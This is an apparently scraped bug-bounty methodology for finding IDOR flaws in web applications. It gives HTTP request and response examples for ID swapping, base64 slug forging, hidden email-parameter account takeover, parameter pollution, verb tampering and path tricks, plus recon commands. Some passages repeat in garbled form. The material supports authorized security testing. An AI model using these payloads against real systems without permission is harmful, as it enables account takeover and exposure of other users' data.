Using organization emails e.g. abc+1@wearehackerone.com, abc+2@wearehackerone.com etc., Create multiple accounts on the web application
id, uuid etc.
Container extensions on Firefox, e.g. PwnFox
Sign in to both accounts using the containers to establish two separate sessions
while the proxy intercepts requests in the background, on one of the accounts (the victim account) CLICK & MODIFY EVERYTHING!!! - Pay special attention to functionalities that return user information or modify user data.
Questions to ask:
Is the request performing a READ (GET - info disclosure) action?
Is the request performing a WRITE (POST, PUT, DELETE - function call) action?
Questions to ask:
Is the request being made to an API endpoint?
Is the request being made to a specific file path?
Does the request contain Parameters in the URI?
Study HTTP requests to look for Direct Object References in URL parameters, Post-data, APIs, Cookies, headers, Filepaths, etc. (e.g. ?uid=1 or ?filename=file_1.pdf).
examples:
https://example.com/messages?user_id=1234
https://example.com/uploads?file=user1236-01.jpeg
https://example.com/group_files?group=group3
examples:
POST /delete_message
...
message_id=user1236-0111
POST /delete_group
...
group=group3
With respect to APIs think about CRUD
C.R.U.D
CREATE : POST
READ : GET
UPDATE: PUT
DELETE : DELETE
URL, Headers, Cookies, Post-data etc.Questions to ask:
Where is the token?
is it in the URL, Header, Cookie, Post-data etc.?
is the token in plaintext?
is the token predictable?
is the token encoded?
is the token hashed?
does the token use custom hashing?
comparing the auth token of user A and user B, do you see a pattern?
Step 3.1 IDOR Protection Bypass Encoding and Hashing
Step 3.1.2 Encoded Authorization Tokens Bypass
Step 3.1.4 Hashed Authorization Tokens Bypass
Step 3.16 Hidden Parameters/APIs
Step 3.18 Use (Hidden) Response Parameters
Step 3.16 Hidden Parameters/APIs
Step 3.17 JS Framework Used? Hidden Functions JS function calls
GF idor
Waybackurls
Email & SMS
Next Request
Sometimes you might come across a simple ?id=1 or filename=file_1.pdf, in other instances the Identity may be encoded or hashed. Or, an authorization token may be used that is encoded or hashed
Sometimes there may be a value in the request that is used to determine the authorization.
In the following scenario the slug parameter (encoded in base64) is used for authorization - the “slug” parameter value was the base64 encoded string of “userID”, i.e., user15, as reflected in the request URL.
Additionally the response displays an extra potential (hidden) parameter email
So, in this case, add the “email” parameter to the request, and replace the “ID” value with the victim’s userID (user18 – dXNlcjE4) along with the encoded “slug” value.
Original Http Request 1:
PUT /api/users/15 HTTP/1.1
Host: target.com
…
{
“name”:”Test User”,
“image”:”IMG URL”,
“slug”:”dXNlcjE1″
}
Original Http Response 1:
HTTP/1.1 200 OK
Set-Cookie: session=xxxxxxxx; Secure; HttpOnly;
...
{
“userid”:”15″,
“name”:”Test User”,
“Email”:”test@example.com”,
“Role”: “User”,
...
}
Notice the Email Parameter in the response code.
Exploit Request 2: Change Request: Notice the changed api endpoint, slug and email
PUT /api/users/18 HTTP/1.1
Host: target.com
…
{
"name":"Test",
"image":"IMG URL"
“Email”:”attackercontrolledaddress@example.com”,
“slug”:”dXNlcjE4″
}
Exploit Http Response 2:
HTTP/1.1 200 OK
Set-Cookie: session=xxxxxxxx; Secure; HttpOnly;
...
{
“userid”:”18″,
“name”:”Test User”,
“Email”:”attackercontrolledaddress@example.com”,
“Role”: “User”
}
Sometimes there may be a value in the request that is used to determine the authorization.
Original Http Request 1:
PUT /api/users/15 HTTP/1.1
Host: target.com
…
{
“name”:”Test User”,
“image”:”IMG URL”,
“slug”:”dXNlcjE1″
}
Original Http Response 1:
HTTP/1.1 200 OK
Set-Cookie: session=xxxxxxxx; Secure; HttpOnly;
...
{
“userid”:”15″,
“name”:”Test User”,
“Email”:”test@example.com”,
“Role”: “User”,
...
}
Notice the Email Parameter in the response code.
Exploit Request 2: Change Request: Notice the changed api endpoint, slug and email
PUT /api/users/18 HTTP/1.1
Host: target.com
…
{
"name":"Test",
"image":"IMG URL"
“Email”:”attackercontrolledaddress@example.com”,
“slug”:”dXNlcjE4″
}
Exploit Http Response 2:
HTTP/1.1 200 OK
Set-Cookie: session=xxxxxxxx; Secure; HttpOnly;
...
{
“userid”:”18″,
“name”:”Test User”,
“Email”:”attackercontrolledaddress@example.com”,
“Role”: “User”
}
Sometimes you might not get the response you're looking for after having attempted an IDOR. In such a case try HTTP Verb Tampering techniques
Many times, webapps use cookies to determine authorisation to access objects.
E.g.
GET /api_v1/messages
Host: example.com
Cookies: phpsessid=SESSION_ID
Since cookies of other users are not trivial to obtain, you can try to blindly append user ID parameters/filepaths etc., to the request.
E.g.
GET /api_v1/messages?uid=ANOTHER_USERS_ID
Host: example.com
Cookies: phpsessid=SESSION_ID
Sometimes applications are developed with alternative ways to retrieve resources using object IDs
Note the parameter uid, should be/can be tested with different parameter names, e.g. id=, user_id=, message_id= etc. It's worth studying other, similar requests in the web app to discover what parameter names are more likely to work
E.g. If the following type of request doesn't work:
GET /get_receipt?receipt_id=2989
Append the appropriate extension:
GET /get_receipt? receipt_id=2989.json
GET /get_receipt? receipt_id=2989.xml
Etc.
Example:
GET /api/v1/users/profile/victim_id HTTP/1.1
Host: example.com
...
Change to:
GET /api/v1/users/profile/my_id/../victim_id HTTP/1.1
Host: example.com
...
Example:
GET /api/users/111 HTTP/1.1
Host: example.com
Try the Following:
GET /api/users/* HTTP/1.1
GET /api/users/% HTTP/1.1
GET /api/users/_ HTTP/1.1
GET /api/users/. HTTP/1.1
Example
GET /admin/profile HTTP/1.1
Host: example.com
...
Change to:
GET /ADMIN/profile HTTP/1.1
Host: example.com
...
Some http requests may contain an Identity number in multiple areas in the URL or body of the request, if this is the case, attempt to change the ID in all areas in all variations to determine if the web application handles access controls differently on each
Execute every possible combination of the request, by removing and changing the ID parameters (headers, data etc.)
Using parameter pollution, pass two UserID parameters; one containing the Victim’s UserID and the other one includes your account’s UserID.
api.example.com/profile=UserId=123
change to:
api.example.com/profile/UserId=456&UserId=123
or try:
api.example.com/profile/UserId=123&UserId=456
See additional Parameter Pollution techniques here:Reset Token via Email Parameter Pollution
Example:
POST /api/get_profile HTTP/1.1
Host: example.com
...
{"user_id":"hacker_id","user_id":"victim_id"}
Combine techniques from Verb Tampering and Parameter Pollution
Example
POST /api/get_profile HTTP/1.1
Host: example.com
...
{"user_id":111}
Change to:
POST /api/get_profile HTTP/1.1
Host: example.com
...
{"id":[111]}
POST /api/get_profile HTTP/1.1
Host: example.com
...
{"user_id":111}
Change to:
POST /api/get_profile HTTP/1.1
Host: example.com
...
{"user_id":{"user_id":111}}
Content-TypeExample:
GET /api/v1/users/1 HTTP/1.1
Host: example.com
Content-type: application/xml
Change to:
GET /api/v1/users/2 HTTP/1.1
Host: example.com
Content-type: application/json
Example
POST /v2/GetData HTTP/1.1
Host: example.com
...
id=123
Change to:
POST /v1/GetData HTTP/1.1
Host: example.com
...
id=123
Note: You may also be able to identify unused (hidden) parameters or APIs in the front-end code in the form of JavaScript AJAX calls.
If that is the case, you may be able to craft requests using the hidden parameters to trigger a different response.
A note on testing: Download JS files
Some web applications developed in JavaScript frameworks may insecurely place function calls on the front-end and use the appropriate ones based on the user role.
pointer: if you look into the front-end JavaScript code you may be able to identify AJAX calls to end-points/APIs that contain direct object references
Example of a basic AJAX function call in JS:
function changeUserPassword() {
$.ajax({
url:"change_password.php",
type: "post",
dataType: "json",
data: {uid: user.uid, password: user.password, is_admin: is_admin},
success:function(result){
//
}
});
}
In this particular example, the slug parameter (encoded in base64) is used for authorization - this gets changed to reflect another user's slug value.
And the hidden Email parameter is used to modify a user's Email.
Example:
Http Request 1:
PUT /api/users/15 HTTP/1.1
Host: target.com
…
{
“name”:”Test User”,
“image”:”IMG URL”,
“slug”:”dXNlcjE1″
}
Http Response 1:
HTTP/1.1 200 OK
Set-Cookie: session=xxxxxxxx; Secure; HttpOnly;
...
{
“userid”:”15″,
“name”:”Test User”,
“Email”:”test@example.com”,
“Role”: “User”,
...
}
Notice the Email Parameter in the response code.
Http Request 2: Change Request:
PUT /api/users/18 HTTP/1.1
Host: target.com
…
{
"name":"Test",
"image":"IMG URL"
“Email”:”attackercontrolledaddress@example.com”,
“slug”:”dXNlcjE4″
}
Http Response 2:
HTTP/1.1 200 OK
Set-Cookie: session=xxxxxxxx; Secure; HttpOnly;
...
{
“userid”:”18″,
“name”:”Test User”,
“Email”:”attackercontrolledaddress@example.com”,
“Role”: “User”
}
Think about scenarios where you can chain bypass techniques
Verb Tampering (GET to POST) -> Post-data Parameter Pollution
Content-type changing -> Wrap ID with Array
Outdated API Version -> Parameter Pollution
Outdated API Version -> Wildcard
Change Value
Note:
If a simple cookie swap doesn't work inspect the request further and methodically test through each applicable bypass technique Step 3 IDOR Protection Bypass Techniques
Note:
If you only have a single account, then apply single account scenario methods
Based on step 2 and 3, use all other applicable bypass techniques
Change Value
IDOR Bypasses
IDOR Bypasses
If you make a purchase from a website, or sign up to a service, they may send a link on which you can view order details, or download an invoice etc.
Cookies may sometimes be used on web application to determine the logged sessions level of authorization (sometimes on specific objects).
Note: This may fall under a weak session issue, but it can be used in conjunction with IDOR to READ or UPDATE Objects.
Identify the type of cookie that is used
Narrow down the value that is used for authorization by filtering out unnecessary cookies
Is the Token a JWT? https://jwt.io/
Is the Cookie value in plaintext?
Is the Cookie value encoded or a hashed value?
you can use gf idor option on a list of URL links that have been collected, to quickly search for URLs with
potential IDORs
e.g.
cat subdomains.txt | waybackurls | sort -u >> waybackdata | gf idor | tee -a idorurls.txt
You can use autorize to perform multi-session requests with pwnfox to colour code requests in particular containers
pwnfox or others), log into 2 separate account sessionsConfiguration>Interception Filters > Select "Scope items only: (Content is not required)" and click on Add filter (be sure to have a scope set in Target > Scope)configuration inside the Autorize tab. As of this writing, this should be under a save headers buttonAuthorize is off to start to turn it onEffectively, you're testing to see if you can perform any functions on User A's account with User B's cookies
Use Applicable Bypass Techniques
On the request, remove the user's cookie to see if the response still successfully references the Object
Autorize